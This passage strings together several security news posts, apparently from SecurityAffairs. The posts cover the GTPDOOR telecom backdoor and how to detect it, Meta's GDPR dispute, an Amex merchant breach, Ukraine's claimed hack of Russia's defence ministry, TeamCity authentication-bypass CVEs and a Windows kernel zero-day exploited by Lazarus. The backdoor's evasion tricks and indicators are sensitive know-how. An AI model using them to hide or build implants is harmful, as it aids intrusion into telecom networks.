The backdoor supports multiple capabilities, including command execution and the deployment of a reverse shell. The malicious code encapsulates requests and responses within GTP_ECHO_REQUEST / GTP_ECHO_RESPONSE messages.

HaxRob explained that the GTPDOOR can be covertly probed from an external network by sending a TCP packet to any port number. If the implant is active, a specially crafted empty TCP packet is returned, accompanied by information regarding the host’s responsiveness.

GTPDOOR also supports authentication and encryption mechanisms.

To avoid detection, GTPDOOR changes its process name to mimic the syslog process invoked as a kernel thread. An intriguing aspect of GTPDOOR is its minimal impact on ingress firewall configurations. As long as the target host is authorized to communicate over the GTP-C port, GTPDOOR operates without necessitating significant firewall adjustments.

Below are the Detection actions recommended by the researcher:

• GTPDOOR can be identified by listing raw sockets open on the system, e.g. via lsof, looking for SOCK_RAW or raw.
• Process name stomped files that are disguised as kernel threads can be identified by their parent process not being kthreadd.
• The presence of the mutex /var/run/daemon.pid could be an indicator.
• The presence of the file system.conf could be an indicator

The researchers also shared Yara rules for this threat.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, backdoor)

This is my interview with TRT International on the Meta dispute with EU consumer groups, which are calling on the bloc to sanction the company

EU consumer groups are calling on the bloc to sanction the company Meta – which owns Facebook, Instagram and WhatsApp – for allegedly breaching privacy rules. Earlier this week, Meta announced it will set up a team to tackle disinformation and the abuse of generative AI in the run-up to the European Parliament elections – amid concerns about fake news. Abdulvehab Ejupi, a journalist at TRT International, reports.

Below are the questions and answers of my interview:

What specific GDPR rules do the consumer groups claim Meta is not complying with?
Consumer groups assert that Meta is not adhering to various rules established by the European privacy regulation GDPR:

1. Fair Processing (Article 5(1)(a)): Personal data must be processed lawfully, fairly, and transparently. Consumer groups claim that Meta’s data collection is unfair and lacks transparency. They also allege that the social network giant potentially includes hidden clauses or misleading explanations about data usage.
2. Data Minimization: Meta is expected to collect limited personal data for a specific scope authorized by users. Consumer groups claim that Meta collects more data than necessary for its stated purposes.
3. Purpose Limitation (Article 5(1)(b)): Personal data must be collected for specified, explicit, and legitimate purposes. According to GDPR, Meta needs to have a legitimate reason, such as explicit consent, contractual necessity, or legal obligation, to collect and use individuals’ data.

Regardless, I emphasize that, according to GDPR, Meta needs a legitimate reason to collect and use individuals’ data, such as explicit consent, contractual necessity, or a legal obligation.

How does the European Consumer Organisation view Meta’s data processing practices in relation to surveillance-based business models?

The European Consumer Organization strongly opposes Meta’s business model for data collection and processing. They perceive this approach as inconsistent with the core rules of GDPR and believe it represents a serious threat to individual privacy rights.

What has been the criticism regarding Meta’s recent launch of paid, ad-free subscriptions in Europe, and how does Meta defend this move?

Critics argue that Meta is charging users for a basic privacy setting while still collecting extensive data. On the other hand, Meta contends that their subscription model is a legal and compliant response to evolving regulations regarding user consent and data processing.”

Below is the video of my interview:

In 2023, the European Union fined Meta $1.3 billion for transferring user data to the US. This is the biggest fine since the adoption of the General Data Protection Regulation (GDPR) by the European Union (EU) on May 25, 2018.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, privacy)

American Express warns customers that their credit cards were exposed due to a data breach experienced by a third-party merchant processor.

American Express (Amex) notifies customers that their credit card information has been compromised in a data breach involving a third-party merchant processor. The company did not disclose the number of impacted customers.

“We became aware that a third party service provider engaged by numerous merchants experienced unauthorized access to its system.” reads the data breach notification sent to the impacted customers. “Account information of some of our Card Members, including some of your account information, may have been involved. It is important to note that American Express owned or controlled systems were not compromised by this incident, and we are providing this notice to you as a precautionary measure.”

The security breach occurred at a service provider that lets customers book flights, hotels and other reservations using an online portal. The hacked third-party merchant processor was processing American Express Card member data. 

Exposed data includes current or previously issued Amex Card account numbers, customer names and other Card information such as the expiration date.

The company recommends customers to vigilantly monitor their account for fraud and suspicious transactions. Amex told customers that would not be responsible for any fraudulent charge on their account.

Amex recommends customers review their account statements over the next 12 to 24 months and enable instant notifications via the company’s mobile app to receive notifications about potential suspicious activity.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The Main Intelligence Directorate (GUR) of Ukraine’s Ministry of Defense claims that it hacked the Russian Ministry of Defense.

The Main Intelligence Directorate (GUR) of Ukraine’s Ministry of Defense announced it had breached the Russian Ministry of Defense servers as part of a special operation, and exfiltrated confidential documents.

Stolen documents include:

• confidential documents, including orders and reports circulated among over 2000 structural units of the Russian military service.
• software used by the Russian Ministry of Defense to encrypt and protect its data.
• a collection of secret service documents belonging to the Russian Ministry of War

The stolen documents allowed intelligence analysts of Ukraine’s GUR to delineate the comprehensive structure of the Russian Ministry of Defense system and its various units.

The documents revealed the leadership of the Russian Ministry, including other high-ranking officials within the divisions of Russian Ministry of Defense. This encompasses deputies, assistants, and specialists, individuals who used the electronic document management systems known as ‘bureaucrat.'”

“Cyber ​​specialists of the Ministry of Defense of Ukraine implemented another successful special operation against the aggressor state of Russia – as a result of the attack, it was possible to gain access to the servers of the Ministry of Defense of the Russian Federation.” reads the press release published by Ukraine’s GUR. “Now the Ukrainian special service has the information protection and encryption software used by the morph, as well as an array of secret service documents of the Russian Ministry of War.”

According to the press release, the GUR also stole the documents belonging to the Deputy Minister of Defense of the Russian Federation, Timur Vadimovich Ivanov.

In November, Ukraine’s intelligence service announced they had hacked Russia’s Federal Air Transport Agency, ‘Rosaviatsia.’ The attack is the result of another complex special cyber operation.

Rosaviatsia is the government agency responsible for the oversight and regulation of civil aviation in Russia. The agency’s primary role is to ensure the safety, security, and efficiency of air transport within the country.

The state-sponsored hackers claimed to have stolen sensitive documents that contained proof of a crisis in Russia’s aviation industry.

The announcement marked the first time that a government admitted to having used hacking as part of its military strategy during a conflict.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Two new security flaws in JetBrains TeamCity On-Premises software can allow attackers to take over affected systems.

Rapid7 researchers disclosed two new critical security vulnerabilities, tracked as CVE-2024-27198 (CVSS score: 9.8) and CVE-2024-27199 (CVSS score:7.3), in JetBrains TeamCity On-Premises.

An attacker can exploit the vulnerabilities to take control of affected systems.

Below are the descriptions for these vulnerabilities:

• CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue (CWE-288) and has a CVSS base score of 9.8 (Critical).
• CVE-2024-27199 is an authentication bypass vulnerability in the web component of TeamCity that arises from a path traversal issue (CWE-22) and has a CVSS base score of 7.3 (High).

“The vulnerabilities may enable an unauthenticated attacker with HTTP(S) access to a TeamCity server to bypass authentication checks and gain administrative control of that TeamCity server.” reads the advisory published by JetBrains.

The flaws impact all TeamCity On-Premises versions through 2023.11.3, it was addressed with the release of version 2023.11.4.

The company also released a security patch plugin for those customers who are unable to patch their systems.

The two flaws were discovered by Stephen Fewer, Principal Security Researcher at Rapid7, were disclosed following Rapid7’s vulnerability disclosure policy.

Rapid7 published a detailed analysis of the two flaws here.

Describing the flaw CVE-2024-27198, the researchers pointed out that an unauthenticated attacker can use a specially crafted URL to bypass all authentication checks. A remote unauthenticated attacker can exploit this flaw to take complete control of a vulnerable TeamCity server.

Recently JetBrains addressed another critical vulnerability in TeamCity servers, tracked as CVE-2024-23917 (CVSS score: 9.8), that could be exploited by an unauthenticated attacker to gain administrative control of servers.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, JetBrains)

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft Windows Kernel vulnerability to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2024-21338 (CVSS Score 7.8) Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.

An attacker can exploit this vulnerability to gain SYSTEM privileges. To take advantage of this vulnerability, a threat actor must initially log in to the system. Then he could execute a specially crafted application designed to exploit the vulnerability and assume control of the compromised system.

The vulnerability was discovered by Jan Vojtěšek from Avast.

At the end of February, Avast researchers observed the North Korea-linked Lazarus APT group using an admin-to-kernel exploit for a zero-day vulnerability in the appid.sys AppLocker driver. 

The zero-day, tracked as CVE-2024-21338 has been addressed by Microsoft in the February Patch Tuesday update.

The nation-state actors exploited the zero-day to gain kernel-level access and disable security software. In past attacks threat actors achieved the same goal by using much noisier BYOVD (Bring Your Own Vulnerable Driver) techniques to cross the admin-to-kernel boundary. 

Lazarus exploited the vulnerability CVE-2024-21338 to perform direct kernel object manipulation in an updated version of their FudModule rootkit.

The flaw CVE-2024-21338 resides within the IOCTL (Input and Output Control) dispatcher of the driver appid.sys. This driver is a core component of the AppLocker application, which is used to control which apps and files users can run. 

Lazarus exploited the zero-day in the appid.sys driver by manipulating the Input and Output Control (IOCTL) dispatcher. This manipulation allows them to arbitrary code on the target system, bypassing security measures

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by March 25, 2024.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – ransomware, Lazarus)